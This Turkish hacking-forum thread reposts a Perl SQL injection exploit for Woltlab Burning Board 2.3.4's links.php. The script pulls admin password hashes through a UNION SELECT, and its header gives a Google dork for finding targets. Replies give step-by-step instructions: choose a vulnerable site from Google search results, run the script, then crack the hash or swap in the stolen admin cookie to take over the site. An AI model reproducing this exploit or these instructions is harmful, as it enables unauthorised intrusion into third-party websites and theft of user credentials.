Burning Board 2.3.4

Neuromancer

Yeni üye
6 Ağu 2006
10
2
Kod:
#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                            ##
##  Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Exploit by       |  666 (SR-Crew)                                         ##
##  Bug by           |  x82                                                   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                             ##
##  Usage            |  links.pl [server] [path]                              ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "[+] Exploiting....\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
    if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
        print "[+] Hash: $1\n";
        exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
        break;
    }
}

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
    if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
        print "[+] Hash: $1\n";
        exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
        print "[+] Try replacing bb1_users with bb2_users\n";
        break;
    }
}
close($sock);

print "[+] Exploit failed\n";

# milw0rm.com [2006-05-20]
 

sauron90

Katılımcı Üye
21 Ocak 2007
435
3
Www.TurkHackTeam.OrG
Kullanımı

Kodu Kopyalayın Not Defretine Yapmıştırın Adını Burning Uzantısını .PL Yapın

c:\perl\bin e atın

Sonra Başlat/Çalıştır/CMD Yazip Enter'a Basın

Sonra Aç Google'yi

Yaz Bunu Burning Board 2.3.4

Çıkan Sitelerden Birisini Seç

Sonra


cd..
cd..
cd perl
cd bin

Burning.pl www.bilmemnesitesi.com

Sonuç: Hash Ve Siteye 1. Üle Olanın Cookie Bilgilerini


Hash ı Kır Kıramassan Cookie Editor İle Sitenin Cookie Ayarlarını Exploitin Verdiği Cookie Bilgileri İle Değiştir Bu Kadar
 

chowzr

Yeni üye
8 Tem 2007
39
2
acıklamaya bakarsan bişi anlamadım c:/perl diye bişi yok


:puah :puah :puah google dan active perl download dıyıp perl ındr onu kur c ne perl gelcek sonrada exploit nedir nasıl kullanılır ve anatomisini bi arastrkendı soruna kendın cevap verıcen.. kolay gelsın

Neuromancer tesekkurler....
 

[email protected]

Yeni üye
14 Tem 2007
37
0
HACKİSTAN
Kullanımı

Kodu Kopyalayın Not Defretine Yapmıştırın Adını Burning Uzantısını .PL Yapın

c:\perl\bin e atın

Sonra Başlat/Çalıştır/CMD Yazip Enter'a Basın

Sonra Aç Google'yi

Yaz Bunu Burning Board 2.3.4

Çıkan Sitelerden Birisini Seç

Sonra


cd..
cd..
cd perl
cd bin

Burning.pl www.bilmemnesitesi.com

Sonuç: Hash Ve Siteye 1. Üle Olanın Cookie Bilgilerini


Hash ı Kır Kıramassan Cookie Editor İle Sitenin Cookie Ayarlarını Exploitin Verdiği Cookie Bilgileri İle Değiştir Bu Kadar


BİR Konu BÖyle Özentlenir İşte saol gardaş
 

Anonymous

Katılımcı Üye
25 Kas 2006
849
5
İstanbul Geceleri
C/Perl dediği nedir?
active perl programını indir.Kur bu perl dilinde yazılmış exploitleri kullanmanız için yazılmış bir programdır.
videolu anlatımım olacak yarın koyarım
 

TrMn

Yeni üye
9 Ocak 2007
19
0
links.pl [server] [path]

Exploiting...
Exploit failed

acaba yolunda mı bi yanlışlık var ki ??
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.